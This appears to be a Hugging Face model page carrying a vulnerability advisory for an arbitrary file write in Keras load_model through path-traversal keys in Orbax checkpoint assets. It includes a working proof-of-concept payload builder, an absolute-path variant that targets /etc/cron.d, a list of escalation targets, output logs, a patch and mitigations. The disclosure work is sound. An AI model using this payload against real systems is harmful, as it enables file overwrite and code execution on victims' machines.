Instructions to use FrankLin00/keras-mfv-poc-001-orbax-write with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Keras
How to use FrankLin00/keras-mfv-poc-001-orbax-write with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://FrankLin00/keras-mfv-poc-001-orbax-write") - Notebooks
- Google Colab
- Kaggle
[internal-id: KERAS-MFV-001] Arbitrary file write at default keras.saving.load_model via Orbax assets path traversal
Severity: CVSS 3.1 8.6 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H). Per-metric justification: AV:L (file delivery; locally readable by the loader); AC:L (default args, no preconditions); PR:N (no privileges required of the attacker); UI:R (the victim must call load_model on the directory); S:C (the write escapes the loader's intended tempfile.TemporaryDirectory() boundary, affecting other security domains); C/I/A:H (arbitrary file write at user privilege chains to RCE-tier outcomes). A network-delivered framing — model directory auto-fetched and loaded by an upstream agent or pipeline — yields AV:N and 9.6 Critical.
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — "Path Traversal") plus CWE-73 (External Control of File Name or Path). CWE-22 covers the relative-path (..) escape; CWE-73 covers the orthogonal absolute-path channel that bypasses os.path.join's base entirely.
Affected versions: Keras >= 3.14.0, <= 3.15.0 (HEAD 42b66280e). The Orbax loader was introduced in 40b910383 (#21903, 2026-01-12) and the assets checkpointable path through _write_nested_dict_to_dir in 449818056 (#22099, 2026-02-16). Both first ship in tag v3.14.0; HEAD declares __version__ = "3.15.0" and is still vulnerable.
Component: keras/src/saving/saving_lib.py (sink), keras/src/saving/saving_api.py (caller chain), keras/src/saving/orbax_util.py (auto-detection that opens the chain on default args).
Reporter: Independent security research.
Summary
keras.saving.load_model(filepath) silently dispatches to an Orbax checkpoint loader whenever filepath is a directory whose listing contains a purely-numeric subdirectory (an Orbax "step directory"). The loader extracts an assets checkpointable — an attacker-supplied nested dict[str, dict | np.ndarray] — and feeds it to saving_lib._write_nested_dict_to_dir, which materialises each leaf at os.path.join(base_dir, key) with no validation of the key. Because keys are fully attacker-controlled, both .. traversal ("../../etc/cron.d/evil") and absolute-path overrides ("/etc/cron.d/evil", where os.path.join discards base_dir) write attacker-chosen bytes to attacker-chosen paths at the loader process's privilege.
Any user — or automated pipeline — who calls the default keras.saving.load_model on an attacker-supplied directory loses arbitrary file-write at their own privilege level: a textbook RCE precursor via standard write-then-trigger gadgets.
Impact
- Arbitrary file write at the loader process's privilege. Each leaf of the malicious
assetsdict is written withopen(child_path, "wb").write(value.tobytes()); both path and bytes are fully attacker-controlled. - Both
..traversal and absolute-path keys are accepted. Verified in the PoC. Absolute keys bypass the base dir entirely with no..segments, defeating naive "look for.." defences. - Reachable from the default public API —
keras.saving.load_model("attacker_dir/")suffices. No flag changes, nosafe_mode=False, no extracustom_objects=.is_orbax_checkpoint(orbax_util.py:11–47) fires on any directory containing a numeric-named subdirectory, so a trivialmkdir attacker_dir/0opens the chain. safe_mode=Truedoes not help.safe_modegates Lambda/object deserialisation deep inside_model_from_config; the assets-write fires on a separate code path that no existing flag mitigates.- Standard escalation to RCE. Arbitrary-write-as-user chains via well-known categories — Python
sitecustomize.py/.pthon the import path, user crontab /~/.config/systemd/user/unit,~/.bashrc,~/.ssh/authorized_keys, binary on$PATH. The advisory deliberately does not weaponise any of these. - Multi-tenant impact. Model-serving containers and notebook hosts that pass user-controlled paths to
load_model(HuggingFace-style "load by repo id" agents, MLOps "import this checkpoint" flows) hand the uploading party arbitrary-write inside the serving process.
Affected Versions
- First vulnerable release: Keras
3.14.0(commits40b910383+449818056, both first present at tagv3.14.0; verified withgit merge-base --is-ancestor). - Last vulnerable release at time of writing: Keras
3.15.0(HEAD42b66280e)._write_nested_dict_to_diris unchanged since introduction. - Reproduction confirmed at: HEAD
42b66280e(Phase 1 unit-level + Phase 2 reachability viakeras.saving.load_model).
Pre-3.14 releases do not contain the Orbax loader and are not affected.
Vulnerability Details
Root cause
keras/src/saving/saving_lib.py:1776–1790:
def _write_nested_dict_to_dir(tree, base_dir):
"""Recursively write a nested dict of numpy arrays to a directory tree.
Each dict key becomes a directory or filename. Leaf values (numpy
arrays) are written as binary files.
"""
for key, value in tree.items():
child_path = os.path.join(base_dir, key)
if isinstance(value, dict):
os.makedirs(child_path, exist_ok=True)
_write_nested_dict_to_dir(value, child_path)
elif isinstance(value, np.ndarray):
os.makedirs(os.path.dirname(child_path), exist_ok=True)
with open(child_path, "wb") as f:
f.write(value.tobytes())
The bug is that key is assumed to be a single path component (a "filename", per the docstring) but never enforced to be one. Three invariants fail simultaneously: (1) os.path.join(base_dir, key) returns key verbatim when key is absolute; (2) .. segments in key resolve child_path outside base_dir; (3) os.makedirs(os.path.dirname(child_path), exist_ok=True) happily creates intermediate directories along the escaped path. The save-side docstring at _save_assets_to_dict (saving_lib.py:1804–1806) ironically advertises the nested-dict representation as one that "avoids platform-specific path separator issues and zip-slip vulnerabilities" — precisely the class that exists on the load side, because the load side never re-validates.
Caller chain (reachability from public API)
keras.saving.load_model(filepath)(re-exported askeras.models.load_model) —saving_api.py:181+.saving_api.py:202–209—if is_orbax_checkpoint(filepath): return _load_model_from_orbax_checkpoint(filepath, ...). No flag changes required.orbax_util.py:11–47—is_orbax_checkpointreturns True for any directory whose listing contains a digit-named subdirectory or any of the markersorbax.checkpoint,pytree.orbax-checkpoint,checkpoint_metadata,.orbax-checkpoint-tmp. The attacker owns the directory, somkdir attacker_dir/0is enough.saving_api.py:363–445—_load_model_from_orbax_checkpointopens the checkpoint viaocp.training.Checkpointerand requestspytree,model_config, and (when present)assets(line 426–427:if "assets" in saved_keys: request["assets"] = None).saving_api.py:443—saving_lib._load_assets_from_dict(model, assets_data)is called with the unvalidated nested dict round-tripped through Orbax storage.saving_lib.py:1856–1860—_load_assets_from_dictallocates atempfile.TemporaryDirectory()and immediately calls_write_nested_dict_to_dir(assets_dict, tmp_dir). The vulnerability fires here, before the tempdir is read back.
grep -rn _load_assets_from_dict keras/ shows exactly one caller; patching at the sink closes the path.
Why safe_mode does not protect
safe_mode=True is the Keras knob for refusing untrusted Lambda layers and untrusted __class__ references during config deserialisation; that gate lives inside _model_from_config / deserialize_keras_object, called by _load_model_from_orbax_checkpoint at saving_api.py:413. The arbitrary file write happens at saving_api.py:443, on a sibling code path. The check is structurally below the gate — flipping safe_mode either way has no effect.
Proof of Concept
The PoC at /home/zitu/mfv/poc/T1B/ reproduces the bug end-to-end in a sealed docker container, writing only a benign sentinel file (poc-marker-T1B-reach).
Environment
Docker image keras-poc:t1b (Python 3.11 + jax-cpu + numpy + orbax-checkpoint 0.11.x + h5py). Keras source mounted read-only at /keras-src; PoC volume mounted at /poc.
Build malicious artifact
/home/zitu/mfv/poc/T1B/run.py --build-only writes a real Orbax checkpoint whose assets checkpointable carries a path-traversal key. The essential payload:
import numpy as np, keras
from orbax.checkpoint import v1 as ocp
from keras.src.saving import saving_lib
model = keras.Sequential(
[keras.layers.Input(shape=(2,)), keras.layers.Dense(2)]
)
model.compile(optimizer="adam", loss="mse")
model.fit(np.zeros((1, 2)), np.zeros((1, 2)), epochs=1, verbose=0)
config_json, _ = saving_lib._serialize_model_as_json(model)
# Poisoned key escapes the tempfile.TemporaryDirectory() (e.g. /tmp/tmpXXXX).
malicious_assets = {
"../../poc/poc-marker-T1B-reach": np.array(
[0x52, 0x45, 0x41, 0x43, 0x48, 0x0A], dtype=np.uint8 # "REACH\n"
)
}
payload = {
"pytree": model.get_state_tree(),
"model_config": {"config": config_json},
"assets": malicious_assets,
}
checkpointer = ocp.training.Checkpointer(directory="/poc/evil_orbax")
with ocp.Context():
checkpointer.save_checkpointables(0, payload)
checkpointer.wait_until_finished(); checkpointer.close()
The malicious dict round-trips through Orbax CompositeCheckpointHandler without sanitisation (key preserved verbatim in _strings.json on disk). An equally effective variant uses an absolute-path key ({"/etc/cron.d/evil": np.array([...], dtype=np.uint8)}) — os.path.join drops the base dir, no .. involved (the CWE-73 channel).
Trigger
docker run --rm --user $(id -u):$(id -g) \
-v /home/zitu/mfv/keras:/keras-src:ro \
-v /home/zitu/mfv/poc/T1B:/poc \
-e PYTHONPATH=/keras-src -e KERAS_BACKEND=jax -e HOME=/tmp \
keras-poc:t1b python /poc/run.py
Inside the container the PoC then runs keras.saving.load_model("/poc/evil_orbax") with all default arguments.
Expected evidence
calling _write_nested_dict_to_dir with key '../poc-marker-T1B-unit'
base_dir = '/poc/sandbox'
/poc/ contents:
FILE /poc/poc-marker-T1B-unit (4 bytes)
DIR /poc/sandbox
/poc/sandbox/ contents: (empty)
[Phase 1] CONFIRMED: file landed OUTSIDE base_dir at /poc/poc-marker-T1B-unit
contents = b'POC\n'
...
saved evil orbax checkpoint at /poc/evil_orbax
invoking keras.saving.load_model() on the evil checkpoint…
load_model() returned without raising
/poc/ contents after load_model():
FILE /poc/poc-marker-T1B-reach (6 bytes)
[Phase 2] REACHABLE: marker landed OUTSIDE the load tmpdir at /poc/poc-marker-T1B-reach
contents = b'REACH\n'
load_model() returns successfully (the model object is even usable); the side effect is silent.
Suggested Patch
Fix at the sink. Validate every key as a single well-formed path component, then realpath-check the resolved child path. Complete diff against keras/src/saving/saving_lib.py at HEAD 42b66280e (validated with git apply --check):
--- a/keras/src/saving/saving_lib.py
+++ b/keras/src/saving/saving_lib.py
@@ -1773,18 +1773,62 @@ def _split_path_components(path):
return parts
+def _is_safe_assets_key(key):
+ """Return True iff ``key`` is a single safe pathname component.
+
+ Rejects empty strings, ``.``/``..`` segments, absolute paths, embedded
+ path separators (POSIX or Windows), and NUL bytes. The intent is that
+ each ``key`` in an assets nested-dict be a *filename*, never a path.
+ """
+ if not isinstance(key, str) or not key:
+ return False
+ if "\x00" in key:
+ return False
+ if os.path.isabs(key):
+ return False
+ # Disallow any path separator on either platform, plus drive letters
+ # of the form "C:..." which Windows treats specially in os.path.join.
+ if "/" in key or "\\" in key:
+ return False
+ if len(key) >= 2 and key[1] == ":":
+ return False
+ if key in (".", ".."):
+ return False
+ return True
+
+
def _write_nested_dict_to_dir(tree, base_dir):
"""Recursively write a nested dict of numpy arrays to a directory tree.
Each dict key becomes a directory or filename. Leaf values (numpy
arrays) are written as binary files.
+
+ Keys are validated to be single safe filename components: keys
+ containing path separators, ``..`` segments, drive letters, NUL
+ bytes, or absolute paths are rejected. As defence-in-depth the
+ resolved child path is also required to stay under ``base_dir``.
"""
+ base_dir_real = os.path.realpath(base_dir)
for key, value in tree.items():
+ if not _is_safe_assets_key(key):
+ raise ValueError(
+ f"Unsafe key in assets dict: {key!r}. Asset keys must be "
+ "single filename components without separators or "
+ "traversal segments."
+ )
child_path = os.path.join(base_dir, key)
+ child_real = os.path.realpath(child_path)
+ if child_real != base_dir_real and not child_real.startswith(
+ base_dir_real + os.sep
+ ):
+ raise ValueError(
+ f"Path escape in assets dict: {key!r} resolves to "
+ f"{child_real!r} which is outside {base_dir_real!r}."
+ )
if isinstance(value, dict):
os.makedirs(child_path, exist_ok=True)
_write_nested_dict_to_dir(value, child_path)
elif isinstance(value, np.ndarray):
os.makedirs(os.path.dirname(child_path), exist_ok=True)
with open(child_path, "wb") as f:
f.write(value.tobytes())
Notes for the patch reviewer:
- The validator rejects POSIX/Windows separators, drive letters, NUL, absolute paths, and
./... Legitimate assets produced by_save_assets_to_dict(saving_lib.py:1793–1841) are structurally guaranteed not to contain any of these — they come from_split_path_components(os.path.relpath(...))on a directory walk — so round-tripping a Keras-produced checkpoint is a no-op. - The
realpathcheck is defence-in-depth against future call sites or symlink races; redundant but cheap on the current site. ValueErrormatches surrounding Keras style. Add a test insaving_lib_test.pythat pinspytest.raises(ValueError)for keys("../escape", "/etc/passwd", "a/b", "..", ".", "x\x00y").
Mitigations (interim)
For users who cannot upgrade once a fixed Keras is published:
- Do not pass untrusted directories to
keras.saving.load_model. The Orbax detection fires on any directory with a numeric-named subdirectory, so attacker-supplied "model folders" trigger the path even when they don't look like Orbax checkpoints. - Sandbox the loader process under
bubblewrap/firejail/ a rootless container with a read-only rootfs, or aseccompfilter that deniesopenat(O_CREAT)outside the model staging directory. - Validate the assets sub-tree before loading: open the checkpoint via
orbax-checkpointdirectly, audit the assets dict's keys (reject empty,..,/,\\, NUL,:, absolute), then delegate tokeras.saving.load_modelonly when clean. - Pin Keras to
< 3.14.0if downgrading is acceptable; removes the entire affected code path.
Credits
Reported by Independent security research (academic vulnerability research project, NTU, contact ziyu.lin@ntu.edu.sg), 2026-05-04.
Timeline
- 2026-05-04: Vulnerability discovered; primitive confirmed at
_write_nested_dict_to_dir; reachability viakeras.saving.load_modelconfirmed end-to-end inside docker; absolute-path variant confirmed. - TBD: Reported privately to
keras-security@google.comand via GHSA private vulnerability report againstkeras-team/keras. - TBD: Patch released and CVE assigned.
- TBD: 90-day public disclosure.
References
- CWE-22 — Path Traversal: https://cwe.mitre.org/data/definitions/22.html
- CWE-73 — External Control of File Name or Path: https://cwe.mitre.org/data/definitions/73.html
- Commit introducing the Orbax loader:
40b910383("Orbax Loading and Sharding Support feature (#21903)"). - Commit introducing the assets dict path:
449818056("Add assets support to OrbaxCheckpoint using checkpointables API (#22099)"). - Related (different class, same component family): CVE-2026-1669 (Keras H5 external dataset file-read). The H5 advisory describes a read primitive; this advisory describes a write primitive in a sibling code path.
- Bug-class precedent: "Zip Slip" disclosure (Snyk, 2018); CVE-2007-4559 (Python
tarfiletraversal).
- Downloads last month
- -